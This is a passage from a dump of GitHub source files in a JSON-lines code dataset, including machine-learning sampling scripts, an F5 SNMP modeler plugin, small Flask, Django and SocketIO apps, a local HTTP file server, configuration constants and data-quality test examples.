+ 1) % 100 == 0:\n        #     print(f'Epoch [{epoch + 1}/{num_epochs}], Step [{i + 1}/{len(train_loader)}], Loss: {loss.item():.4f}')\n    if epoch == step:\n        writer.add_image(f\"image_{step}\", images[23].view(1, 28, 28), step)\n        writer.add_image(f\"output_image_{step}\", outputs[23].view(1, 28, 28), step)\n        step = step * 2\n    writer.add_scalar(\"Loss_epoch/train\", running_loss / i, epoch + 1)\n    print(f'Epoch 
[{epoch + 1}/{num_epochs}], Loss: {loss.item():.4f}')\nwriter.close()\nprint('Training completed.')\n","repo_name":"codezzzsleep/self-supervised","sub_path":"AutoEncoder/stackAE.py","file_name":"stackAE.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40978418095","text":"import os\nimport argparse\n\nfrom tqdm import tqdm\n\nfrom char_stylist import CharStylist\nfrom utility import char2code, pathstr, save_images, save_single_image\n\nimport numpy as np\nimport torch\n\n\ndef main(\n save_path,\n stable_diffusion_path,\n \n sheet_type,\n writers,\n \n device,\n):\n char_stylist = CharStylist.load(\n save_path,\n stable_diffusion_path,\n \n device,\n )\n \n if sheet_type == \"hiragana\":\n nrow = 11\n chars = [\n \"あ\", \"い\", \"う\", \"え\", \"お\",\n \"か\", \"き\", \"く\", \"け\", \"こ\",\n \"さ\", \"し\", \"す\", \"せ\", \"そ\",\n \"た\", \"ち\", \"つ\", \"て\", \"と\",\n \"な\", \"に\", \"ぬ\", \"ね\", \"の\",\n \"は\", \"ひ\", \"ふ\", \"へ\", \"ほ\",\n \"ま\", \"み\", \"む\", \"め\", \"も\",\n \"や\", None, \"ゆ\", None, \"よ\",\n \"ら\", \"り\", \"る\", \"れ\", \"ろ\",\n \"わ\", \"ゐ\", None, \"ゑ\", \"を\",\n \"ん\", None, None, None, None,\n ]\n chars = [chars[(11 - (i % 11 + 1)) * 5 + (i // 11)] for i in range(len(chars))]\n \n elif sheet_type == \"katakana\":\n nrow = 11\n chars = [\n \"ア\", \"イ\", \"ウ\", \"エ\", \"オ\",\n \"カ\", \"キ\", \"ク\", \"ケ\", \"コ\",\n \"サ\", \"シ\", \"ス\", \"セ\", \"ソ\",\n \"タ\", \"チ\", \"ツ\", \"テ\", \"ト\",\n \"ナ\", \"ニ\", \"ヌ\", \"ネ\", \"ノ\",\n \"ハ\", \"ヒ\", \"フ\", \"ヘ\", \"ホ\",\n \"マ\", \"ミ\", \"ム\", \"メ\", \"モ\",\n \"ヤ\", None, \"ユ\", None, \"ヨ\",\n \"ラ\", \"リ\", \"ル\", \"レ\", \"ロ\",\n \"ワ\", \"ヰ\", None, \"ヱ\", \"ヲ\",\n \"ン\", None, None, None, None,\n ]\n chars = [chars[(11 - (i % 11 + 1)) * 5 + (i // 11)] for i in range(len(chars))]\n \n else:\n raise Exception(f\"unknown sheet_type: {sheet_type}\")\n \n for char in chars:\n if char is None:\n continue\n if char not in char_stylist.char2idx:\n raise Exception(f\"unknown character: {char}\")\n \n for writer in writers:\n if writer not in char_stylist.writer2idx:\n raise Exception(f\"unknown writer: {writer}\")\n \n # sampling\n images_list = []\n for char in tqdm(chars):\n if char is None:\n images_list.append(torch.zeros((len(writers), 3, 64, 64)))\n else:\n images_list.append(char_stylist.sampling(char, writers))\n \n for i, writer in enumerate(writers):\n image_path = os.path.join(save_path, \"generated\", f\"sheet_{sheet_type} writer={writer}.jpg\")\n save_images([images[i] for images in images_list], image_path, nrow=nrow)\n \n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n \n parser.add_argument(\"--save_path\", type=pathstr, default=pathstr(\"./datadisk/save_path/test ETL4,ETL5\"))\n parser.add_argument(\"--stable_diffusion_path\", type=pathstr, default=pathstr(\"~/datadisk/stable-diffusion-v1-5\"))\n \n parser.add_argument(\"--sheet_type\", type=str, default=\"hiragana\")\n parser.add_argument(\"--writers\", type=str, nargs=\"*\",\n default=([f\"ETL4_{i}\" for i in range(5001, 5016 + 1)] + [f\"ETL5_{i}\" for i in range(6001, 6016 + 1)]))\n \n parser.add_argument(\"--device\", type=str, default=\"cuda:0\")\n \n args = parser.parse_args()\n \n # todo: validation\n \n main(\n args.save_path,\n args.stable_diffusion_path,\n \n args.sheet_type,\n args.writers,\n \n args.device,\n 
)\n","repo_name":"yawarakacream/CharStylist","sub_path":"sheet_sampling.py","file_name":"sheet_sampling.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38580654498","text":"\"\"\"\nGather F5 LTM Virtual Server Information\n\n@author: David Petzel\n@contact: david.petzel@disney.com\n@date: 05/06/2011\n\n\"\"\"\n\nfrom Products.DataCollector.plugins.CollectorPlugin import SnmpPlugin, GetTableMap, GetMap\nfrom Products.DataCollector.plugins.DataMaps import ObjectMap\nimport re\nimport binascii\nimport string\nimport socket\nfrom pprint import pprint\n\nclass BigipLtmVirtualServerMap(SnmpPlugin):\n \"\"\"\n Handles the modeling of Virtual Servers on the LTM\n \n Custom Properties Added:\n zVirtualServerNameFilter - This will provide a list of regex strings to compare\n the virtual server name against. Only items that match will be returned.\n When left blank all virtual servers will be returned\n \n \"\"\"\n relname = \"LtmVs\"\n modname = \"ZenPacks.community.f5.BigipVirtualServer\"\n deviceProperties = SnmpPlugin.deviceProperties + ('zF5BigipVirtualServerNameFilter',)\n \n # Column dictionaries represent the OID ending for the data point your interested in.\n # This value gets appended to the base issue listed in the snmpGetTableMaps call\n basecolumns = {\n '.1.1': 'ltmVirtualServName',\n '.1.3': 'ltmVirtualServAddr',\n '.1.6': 'ltmVirtualServPort',\n }\n # The VIP Status is provided from a separate table\n status_columns = {\n '.1.1': 'ltmVsStatusName',\n '.1.2': 'ltmVsStatusAvailState',\n '.1.3': 'ltmVsStatusEnabledState',\n '.1.5': 'ltmVsStatusDetailReason', \n }\n \n \n snmpGetTableMaps = (\n #Virtual Server Table\n GetTableMap('ltmVirtualServTable', '.1.3.6.1.4.1.3375.2.2.10.1.2', basecolumns),\n GetTableMap('ltmVsStatusTable', '.1.3.6.1.4.1.3375.2.2.10.13.2', status_columns)\n )\n\n \n \n def process(self, device, results, log):\n \"\"\"\n Just as it sounds\n \"\"\"\n #The availability of the specified virtual server indicated in color.\n #none - error;\n #green - available in some capacity;\n #yellow - not currently available;\n #red - not available;\n #blue - availability is unknown;\n #gray - unlicensed.\n avail_status_values = {\n 0: 'None - Error',\n 1: 'Green - available in some capacity',\n 2: 'Yellow - not currently available',\n 3: 'Red - not available',\n 4: 'Blue - availability is unknown',\n 5: 'Gray - unlicensed',\n }\n \n \n #The activity status of the specified virtual server, as specified \n #by the user.\n enable_state_values = {\n 1: 'Enabled',\n 2: 'Disabled'\n }\n \n log.info('processing %s for device %s', self.name(), device.id)\n getdata, tabledata = results\n \n vs_table = tabledata.get(\"ltmVirtualServTable\")\n \n # Grab the second table and append it to the first\n status_table = tabledata.get(\"ltmVsStatusTable\")\n for oid, data in status_table.items():\n for key, value in data.items():\n if key not in vs_table[oid]:\n vs_table[oid][key] = value\n \n maps = []\n rm = self.relMap()\n # Get the list of name patterns to search for\n VirtualServerNameFilter = getattr(device, 'zF5BigipVirtualServerNameFilter', None)\n log.debug(\"Picked up Filter List of: %s\" , VirtualServerNameFilter)\n for oid, data in vs_table.items():\n # log.debug(\"%s : %s\\n\", oid, data)\n #\n om = self.objectMap(data)\n include_vs = True\n if VirtualServerNameFilter != None and VirtualServerNameFilter != \"\":\n # If there is a regex filter supplied, lets use it\n if 
re.search(VirtualServerNameFilter, om.ltmVirtualServName) == None:\n include_vs = False\n if include_vs == True:\n om.id = self.prepId(om.ltmVirtualServName)\n om.snmpindex = oid\n # The value fetched is a packed hex representation of the IP\n # Use socket to convert to octet based IP\n # http://docs.python.org/library/socket.html#socket.inet_ntoa\n om.vsIP = socket.inet_ntoa(om.ltmVirtualServAddr)\n #print om.status\n if om.ltmVsStatusAvailState == 1:\n om.status = \"Up\"\n else:\n om.status = \"Down\"\n \n om.VsStatusEnabledState = enable_state_values[om.ltmVsStatusEnabledState]\n om.VsStatusAvailState = avail_status_values[om.ltmVsStatusAvailState]\n om.VsStatusDetailReason = om.ltmVsStatusDetailReason\n rm.append(om)\n #log.debug(rm)\n return [rm] \n \n\n\n ","repo_name":"zenoss/Community-Zenpacks","sub_path":"ZenPacks.community.f5/ZenPacks/community/f5/modeler/plugins/BigipLtmVirtualServerMap.py","file_name":"BigipLtmVirtualServerMap.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"17505101501","text":"\nfrom veem.client.veem import VeemClient\nfrom veem.client.requests.exchange_rate import ExchangeRateRequest\n\nif __name__ == '__main__':\n\n # define a VeemClient Context Manager with yaml+file and auto login.\n with VeemClient(yaml_file='/path/to/your/configuration.yaml',\n useClientCredentials=True) as veem:\n # define an ExchangeRateRequest\n request = ExchangeRateRequest(fromAmount=500.0,\n fromCurrency='CAD',\n fromCountry='CA',\n toCurrency='USD',\n toCountry='US')\n # request the fx rate\n rate = veem.exchangeRateClient.generate(request)\n","repo_name":"veeminc/veem-python-sdk","sub_path":"examples/request_fx_quote.py","file_name":"request_fx_quote.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34028071601","text":"#!/usr/bin/env python\n\"\"\"\nmth_py_httpsrvhere: Simple HTTP server to serv local dir\nv: 1.0.2\nd: 06022018\n\"\"\"\nimport sys, os\nimport time\nimport optparse\nimport SimpleHTTPServer\nimport SocketServer\n\nMKVRSN = \"1.0.2_06022018\"\nMKPROG = \"httpsrvhere\"\nMKDESC = \"meka_py_httpsrvhere: Simple HTTP server to serv local dir\"\nMKEPIL = \"a meka nekal creation with <3\"\n\nPORT = 38080\nADDR = \"0.0.0.0\"\n\nSMPLSRVR_EXT = { '.webapp': 'application/x-web-app-manifest+json', }\n\ndef prs_cmdline( ):\n prog = MKPROG\n version = \"%prog \" + MKVRSN\n description = MKDESC\n epilog = MKEPIL\n o = optparse.OptionParser(prog=prog, version=version, description=description, epilog=epilog )\n o.add_option( \"-p\", \"--port\", dest=\"LPORT\", help=\"Listen Port,\\tdef:%d\"%PORT, default=PORT, type=int ) #action=\"store_true\", default=False)\n o.add_option( \"-l\", dest=\"LADDR\", help=\"Listen Address,\\tdef:%s\"%ADDR, default=ADDR, type=str )\n #o.add_option(\"-f\",dest=\"logfn\",help=\"File to save logs\",default=\"/var/log/httpsrvhere\" )\n return o.parse_args()\n\ndef bld_url( sa, lurl = \"http://\" ):\n if sa[0]==\"\" or sa[0]==\"0.0.0.0\": lurl+=\"127.0.0.1\"\n else: lurl+=sa[0]\n if sa[1]!=80: lurl+=\":%d\"%sa[1]\n lurl+=\"/\"\n return lurl\n\ndef prep_server(options):\n Handler = SimpleHTTPServer.SimpleHTTPRequestHandler\n Handler.extensions_map.update(SMPLSRVR_EXT)\n httpd = SocketServer.TCPServer((options.LADDR, options.LPORT),Handler)\n return Handler, httpd\n\ndef main( ):\n options, args = prs_cmdline()\n lurl = \"http://\"\n print( \"[!] 
Server INIT...\" )\n Handler, httpd = prep_server( options )\n print( \"[!] Server STARTING !\" )\n lurl = bld_url( httpd.socket.getsockname( ) )\n print( \"[+] Serving at port %s:%d\" % ( options.LADDR, options.LPORT ) )\n print( \" \\\\__ %s\" % lurl )\n httpd.serve_forever( )\n\nif __name__ == '__main__':\n main( )\n","repo_name":"Methimpact/httpsrvhere","sub_path":"httpsrvhere.py","file_name":"httpsrvhere.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118662313","text":"MOD = 10 ** 9 + 7\n\n\nclass Solution:\n\n def __init__(self):\n self.s = ''\n self.k = 0\n self.memo = {}\n\n def numberOfArrays(self, s: str, k: int) -> int:\n self.s = s\n self.k = k\n return self.dfs(0)\n\n def dfs(self, start_idx):\n if start_idx == len(self.s):\n return 1\n if self.s[start_idx] == '0':\n return 0\n if start_idx in self.memo:\n return self.memo[start_idx]\n\n num = 0\n res = 0\n for end_idx in range(start_idx, len(self.s)):\n num = num * 10 + int(self.s[end_idx])\n if num > self.k:\n break\n res += self.dfs(end_idx + 1)\n res %= MOD\n\n self.memo[start_idx] = res\n return res\n","repo_name":"cabulous/leetcode","sub_path":"python/1416.py","file_name":"1416.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72566445674","text":"VERSION = '0.7'\nOWNER_TAG = 'gwm:owner:'\n\n# Form Constants\nEMPTY_CHOICE_FIELD = (u'', u'---------')\n\nMODE_CHOICES = (\n ('live','Live'),\n ('non-live','Non-Live'),\n)\n\nNODE_ROLE_MAP = {\n 'M':'Master',\n 'C':'Master Candidate',\n 'R':'Regular',\n 'D':'Drained',\n 'O':'Offline',\n}\n\nROLE_CHOICES = (\n EMPTY_CHOICE_FIELD,\n (u'master-candidate',u'Master Candidate'),\n (u'regular',u'Regular'),\n (u'drained',u'Drained'),\n (u'offline',u'Offline'),\n)\n\nROLE_MAP = {\n 'C':u'master-candidate',\n 'R':u'regular',\n 'D':u'drained',\n 'O':u'offline',\n}\n\n# KVM Choices\nKVM_BOOT_ORDER = [\n (u'disk', u'Hard Disk'),\n (u'cdrom', u'CD-ROM'),\n (u'network', u'Network'),\n]\n\nKVM_FLAGS = [\n EMPTY_CHOICE_FIELD,\n (u'enabled', u'Enabled'),\n (u'disabled', u'Disabled'),\n]\n\nKVM_DISK_TYPES = [\n (u'scsi', u'scsi'),\n (u'sd', u'sd'),\n (u'mtd', u'mtd'),\n (u'pflash', u'pflash'),\n]\n\nKVM_NIC_TYPES = [\n (u'i82551',u'i82551'),\n (u'i82557b',u'i82557b'),\n (u'i82559er',u'i82559er'),\n (u'pcnet',u'pcnet'),\n (u'e1000',u'e1000'),\n]\n\n# Xen HVM Choices\nHVM_BOOT_ORDER = [\n (u'cd', u'Hard Disk, CD-ROM'),\n (u'a', u'Floppy Drive'),\n (u'c', u'Hard Disk'),\n (u'd', u'CD-ROM'),\n (u'n', u'Network'),\n]\n\nHVM_DISK_TYPES = [\n (u'ioemu', u'ioemu'),\n]\n\n# HV Choices\nHV_DISK_TEMPLATES = [\n EMPTY_CHOICE_FIELD,\n (u'plain', u'plain'),\n (u'drbd', u'drbd'),\n (u'file', u'file'),\n (u'diskless', u'diskless')\n]\n\n# HV Choices\nHV_DISK_TEMPLATES_SINGLE_NODE = [\n EMPTY_CHOICE_FIELD,\n (u'plain', u'plain'),\n (u'file', u'file'),\n (u'diskless', u'diskless')\n]\n\nHV_DISK_TYPES = [\n EMPTY_CHOICE_FIELD,\n (u'paravirtual',u'paravirtual'),\n (u'ide',u'ide'),\n]\n\nHV_NIC_MODES = [\n EMPTY_CHOICE_FIELD,\n (u'routed', u'routed'),\n (u'bridged', u'bridged')\n]\n\nHV_NIC_TYPES = [\n EMPTY_CHOICE_FIELD,\n (u'rtl8139',u'rtl8139'),\n (u'ne2k_isa',u'ne2k_isa'),\n (u'ne2k_pci',u'ne2k_pci'),\n (u'paravirtual',u'paravirtual'),\n]\n\nHV_BOOT_ORDER = KVM_BOOT_ORDER\n\nHV_DISK_CACHES = [\n (u'none',u'None'),\n (u'default',u'Default'),\n (u'writethrough',u'Writethrough'),\n 
(u'writeback',u'Writeback'),\n]\n\nHV_SECURITY_MODELS = [\n (u'none',u'None'),\n (u'user',u'User'),\n (u'pool',u'Pool'),\n]\n\nHV_USB_MICE = [\n EMPTY_CHOICE_FIELD,\n (u'mouse',u'Mouse'),\n (u'tablet',u'Tablet'),\n]\n\nALL_DISK_TYPES = HV_DISK_TYPES + KVM_DISK_TYPES + HVM_DISK_TYPES\nALL_NIC_TYPES = HV_NIC_TYPES + KVM_NIC_TYPES\nALL_BOOT_ORDER = KVM_BOOT_ORDER + HVM_BOOT_ORDER\n\nKVM_CHOICES = {\n 'disk_type': HV_DISK_TYPES + KVM_DISK_TYPES,\n 'nic_type': HV_NIC_TYPES + KVM_NIC_TYPES,\n 'boot_order': KVM_BOOT_ORDER,\n}\n\nHVM_CHOICES = {\n 'disk_type': HV_DISK_TYPES + HVM_DISK_TYPES,\n 'nic_type': HV_NIC_TYPES,\n 'boot_order': HVM_BOOT_ORDER,\n}\n\nALL_CHOICES = {\n 'disk_type': ALL_DISK_TYPES,\n 'nic_type': ALL_NIC_TYPES,\n 'boot_order': ALL_BOOT_ORDER,\n}\n\nNO_CHOICES = {\n 'disk_type': None,\n 'nic_type': None,\n 'boot_order': None,\n}\n\n","repo_name":"bsu/GWM2","sub_path":"ganeti_web/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10511574939","text":"import media\n\n\ndef get_movie_list():\n \"\"\"\n Returns:\n A list of populated media.Movie objects\n \"\"\"\n print(\"Generating movie list...\")\n movie_list = []\n movie_list.append(media.Movie(\n title='Four Brothers',\n summary='Mark Wahlberg takes on a crime syndicate with his brothers.',\n trailer_youtube_url='https://www.youtube.com/watch?v=vZPi0K6UoP8',\n rating=5,\n imdb_id='tt0430105'))\n movie_list.append(media.Movie(\n 'American Sniper',\n imdb_id='tt2179136',\n trailer_youtube_url='https://www.youtube.com/watch?v=5bP1f_1o-zo',\n rating=5))\n movie_list.append(media.Movie(\n imdb_id='tt0120657',\n trailer_youtube_url='https://www.youtube.com/watch?v=JYUBKcurY88',\n rating=4))\n movie_list.append(media.Movie(\n imdb_id='tt0416449',\n trailer_youtube_url='https://www.youtube.com/watch?v=UrIbxk7idYA',\n rating=5))\n movie_list.append(media.Movie(\n imdb_id='tt1790885',\n trailer_youtube_url='https://www.youtube.com/watch?v=k7R2uVZYebE',\n rating=5))\n movie_list.append(media.Movie(\n imdb_id='tt0119698',\n trailer_youtube_url='https://www.youtube.com/watch?v=4OiMOHRDs14',\n rating=5))\n print(\"Done!\")\n return movie_list\n","repo_name":"jasonvanbiezen/p1_fresh_tomatoes","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34076806238","text":"\"\"\"\n这道题的关键点在于发现如下规律:\n设k为从大到小第k个,\n第n为的数值a一定等于 :\n a = ceil (k/(n-1)!)\n\n该数所在的索引为止为:\na-1\n\"\"\"\n\n\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n import math\n res = ''\n num = [i+1 for i in range(n)]\n while len(num) > 0:\n t = math.ceil (k/math.factorial(len(num) - 1)) - 1\n k = k - math.factorial(len(num) - 1) * t\n res += str(num.pop(t))\n return res\n\nfoo = Solution()\nprint(foo.getPermutation(4,9))","repo_name":"Allen-C-Guan/Leetcode-Answer","sub_path":"python_part/Leetcode/others/math/60. Permutation Sequence/ans.py","file_name":"ans.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2996091627","text":"from django.shortcuts import render,redirect\nfrom . 
models import *\n# Create your views here.\ndef home(request):\n return render(request,'home.html')\ndef Product(request):\n category=CategoryModel.objects.all()\n context={'Category':category}\n return render(request,'adddproduct.html',context)\n\n\ndef AddCategory(request):\n if request.method == 'POST':\n categoryname=request.POST['Name']\n data = CategoryModel(Name=categoryname)\n data.save()\n print('added')\n # messages.info(request, 'New User Added')\n return redirect('home')\n\n\ndef CategoryPage(request):\n return render(request,'addcategory.html')\n\n\ndef AddProduct(request):\n if request.method=='POST':\n pprice=request.POST['Price']\n pdes=request.POST['Description']\n pqty=request.POST['Quantity']\n select=request.POST['select']\n category=CategoryModel.objects.get(id=select)\n data = ProductModel(Price=pprice,Description=pdes,Quantity=pqty,Category=category)\n \n data.save()\n print('added')\n return redirect('home')\n\n\ndef ProductDetails(request):\n Product_detail = ProductModel.objects.all()\n return render(request,'productdetail.html',{'product':Product_detail})\n\n\ndef Tables(request):\n category=CategoryModel.objects.all()\n Product=ProductModel.objects.all()\n return render(request,'table.html',{'cdata':category,'pdata':Product})\n \n","repo_name":"rashinrichu/Ecom","sub_path":"Product/Add_product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"221908167","text":"from flask import Flask, jsonify, request, send_file, render_template, redirect, url_for\nfrom flask_socketio import SocketIO, emit\n\napp = Flask(__name__, template_folder=\"venv\\Templates\" , static_folder=\"static\")\napp.config['DEBUG'] = True\nsocketio = SocketIO(app)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef home():\n if request.method == \"POST\":\n user = request.form.get('user')\n if user != \"\":\n return render_template(\"chat.html\", user=user)\n return render_template(\"base.html\")\n\n\n@socketio.on('joined_room')\ndef handle_new_connection(user):\n emit('joined_announcement', user, broadcast=True)\n\n\n@socketio.on('new_message')\ndef handle_new_message(data):\n emit('broadcast_message', data, broadcast=True)\n\n\nif __name__ == \"__main__\":\n socketio.run(app, host=\"0.0.0.0\")\n","repo_name":"kaankvrck/Python-Web","sub_path":"python_Chat_Flask/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18923075904","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport os\nimport shlex\nimport shutil\nimport subprocess\nimport zipfile\n\nBASEDIR = subprocess.check_output(shlex.split(\n 'git rev-parse --show-toplevel',\n)).strip()\nADAPTERDIR = os.path.join(BASEDIR, 'adapter')\nVERSIONPATH = os.path.join(ADAPTERDIR, 'version.txt')\n\n\ndef get_last_tag():\n \"\"\" Return latest tag from git. \"\"\"\n describe = subprocess.check_output(shlex.split(\n 'git describe',\n )).strip()\n last_tag = describe.split('-')[0]\n return last_tag\n\n\ndef do(command):\n \"\"\" Do command via subprocess and return result. \"\"\"\n return subprocess.call(shlex.split(command))\n\n\ndef checkout(tag=None):\n \"\"\" Checkout tag with git. 
\"\"\"\n if tag is None:\n do('git checkout master')\n do('git stash pop')\n else:\n do('git stash save')\n return do('git checkout {}'.format(tag))\n \n\ndef create_version_file(versionpath, version):\n \"\"\" Create a versionfile at filepath. \"\"\"\n with open(versionpath, 'w') as versionfile:\n versionfile.write('# version: {}\\n'.format(version))\n\n\ndef create_zipfile(zippath, zipdir):\n \"\"\" Create a zipfile at zippath and add zipdir to it. \"\"\"\n with zipfile.ZipFile(zippath, 'w', zipfile.ZIP_DEFLATED) as archivefile:\n for path, dirnames, filenames in os.walk(zipdir):\n for filename in filenames:\n if filename.endswith('.pyc'):\n continue\n archivefile.write(\n os.path.join(path, filename),\n os.path.join(os.path.basename(zipdir), filename),\n )\n\n\ndef main(*args, **kwargs):\n last_tag = get_last_tag()\n zippath = os.path.join(BASEDIR, 'adapter-{}.zip'.format(last_tag))\n if checkout(last_tag) == 0: # No errors\n create_version_file(versionpath=VERSIONPATH, version=last_tag)\n create_zipfile(zippath=zippath, zipdir=ADAPTERDIR)\n os.remove(VERSIONPATH)\n checkout()\n","repo_name":"nens/timeseries","sub_path":"adapter/ziprelease.py","file_name":"ziprelease.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16297401783","text":"file=open(\"Important_Places.tsv\",\"r\")\nfile.readline()\nPlaces=[]\nfor line in file:\n\tline=line.split(\" \")\n\tPlaces.append(line[0])\nPlaces=list(set(Places))\n#print Places\nfile=open(\"IN.csv\",\"r\")\noutputfile=open(\"Imp_Places_LatLon.csv\",\"w\")\nfor line in file:\n\tline=line.split(\",\")\n\tif line[2] in Places:\n\t\toutputfile.write(line[2]+\",\"+line[3]+\",\"+line[9]+\",\"+line[10]+\"\\n\")\n\n","repo_name":"SaiCharanRegunta/QGiS-python-Plugins","sub_path":"wiki_Extraction/Project_Plugin/LatLonImpPlacesConvert.py","file_name":"LatLonImpPlacesConvert.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41221408581","text":"import os\nimport logging\n\nfrom dataraven.connections import PostgresConnector\nfrom dataraven.data_quality_operators import SQLNullCheckOperator, SQLDuplicateCheckOperator, CustomSQLDQOperator,\\\n CSVNullCheckOperator, CSVSetDuplicateCheckOperator\n\n\ndef init_logging(logfile=\"example_test.log\"):\n # remove previous run log file\n if os.path.exists(logfile):\n os.remove(logfile)\n\n # create log message formatting\n format = \"%(asctime)s | %(name)s | %(levelname)s | \\n%(message)s\\n\"\n formatter = logging.Formatter(format)\n\n # create log level\n level = logging.DEBUG\n\n # create file handler\n handler = logging.FileHandler(logfile)\n\n # set log formatter and level\n handler.setFormatter(formatter)\n handler.setLevel(level)\n\n # create logger function\n logger = logging.getLogger(__name__)\n\n # set logger level and handler\n logger.setLevel(level)\n logger.addHandler(handler)\n return logger\n\n\ndef main():\n # initialize logging\n logger = init_logging().info\n\n # database connection credentials\n user = os.environ[\"user\"]\n password = os.environ[\"password\"]\n host = os.environ[\"host\"]\n dbname = os.environ[\"dbname\"]\n port = os.environ[\"port\"]\n\n # postgres database connector\n conn = PostgresConnector(user, password, host, dbname, port, logger=logger)\n\n # test thresholds\n threshold0 = 0\n threshold1 = 0.01\n threshold5 = 0.05\n threshold10 = 0.1\n\n ##### TEST ORDERS TABLE #####\n 
orders_from_clause = \"test_schema.Orders\"\n orders_where_clause = [\"date(order_ts) = '2020-09-08'\"]\n\n # test for duplicates\n orders_duplicates_test_column = \"id\"\n SQLDuplicateCheckOperator(conn, orders_from_clause, threshold0, orders_duplicates_test_column,\n where=orders_where_clause, logger=logger)\n\n # test multiple columns using one threshold\n orders_null_test_columns = (\"name\", \"product_id\", \"price\")\n SQLNullCheckOperator(conn, orders_from_clause, threshold0, *orders_null_test_columns,\n where=orders_where_clause, logger=logger)\n\n ##### TEST Contacts_table.csv #####\n\n #contacts_path = \"../test_data/Contacts_table.csv\"\n contacts_path = \"test_data/Contacts_table.csv\"\n\n # test first_name-last_name for duplicates\n contacts_duplicats_test_columns = (\"first_name\", \"last_name\")\n CSVSetDuplicateCheckOperator(contacts_path, threshold0, *contacts_duplicats_test_columns, logger=logger)\n\n # test email, state for null values\n contacts_null_columns = (\"email\", \"country\")\n contacts_null_threshold = {\"email\": threshold10, \"country\": 0.5}\n CSVNullCheckOperator(contacts_path, contacts_null_threshold, *contacts_null_columns, logger=logger)\n\n ##### TEST EARTHQUAKES TABLE #####\n # test magnitude is bounded above at 10\n magnitude_bounds_test_description = \"Earthquakes.magnitude should be less than 10\"\n magnitude_bounds_test_query = \"\"\"\n select\n case\n when measure > 0 then 'test_fail'\n else 'test_pass'\n end as result,\n measure,\n 0 as threshold\n from\n (select count(1) as measure\n from test_schema.Earthquakes\n where magnitude > 10)t\n \"\"\"\n CustomSQLDQOperator(conn, magnitude_bounds_test_query, magnitude_bounds_test_description, logger=logger)\n\n # test columns for blank values\n earthquakes_columns = (\"state\", \"epicenter\", \"date\", \"magnitude\")\n earthquake_null_thresholds = {\"state\": threshold0, \"epicenter\": threshold5, \"date\": threshold1,\n \"magnitude\": threshold0}\n earthquake_col_not_blank_description = \"\"\"{column} in table test_schema.Earthquakes should have fewer than \n {threshold} BLANK values.\"\"\"\n earthquake_col_not_blank_query = \"\"\"\n select \n case\n when measure is NULL then 'test_fail'\n when measure > {threshold} then 'test_fail'\n else 'test_pass'\n end as result,\n measure,\n {threshold} as threshold\n from\n (select \n case when rows_ > 0 then cast(blank_cnt as float) / rows_ end as measure\n from\n (select \n count(1) as rows_,\n sum(case when cast({column} as varchar) = '' then 1 else 0 end) as blank_cnt\n from test_schema.Earthquakes)t)tt\n \"\"\"\n CustomSQLDQOperator(\n conn,\n earthquake_col_not_blank_query,\n earthquake_col_not_blank_description,\n *earthquakes_columns,\n threshold=earthquake_null_thresholds,\n logger=logger\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Qbizinc/qbiz-data-raven-depricated","sub_path":"tests/example_test.py","file_name":"example_test.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"161700409","text":"from itertools import chain\n\nimport pytest\n\n\n@pytest.fixture\ndef report_data():\n return [\n { # User creation failed: user with error, no collector\n 'login': 'some_login1',\n 'error': 'some user error',\n },\n {\n # User created, collector error\n 'login': 'some_login1.5',\n 'collectors': [{\n 'status': 'some collector error',\n 'errors': 0,\n 'collected': 0,\n 'total': 0,\n }],\n },\n { # No errors, single collector\n 'login': 
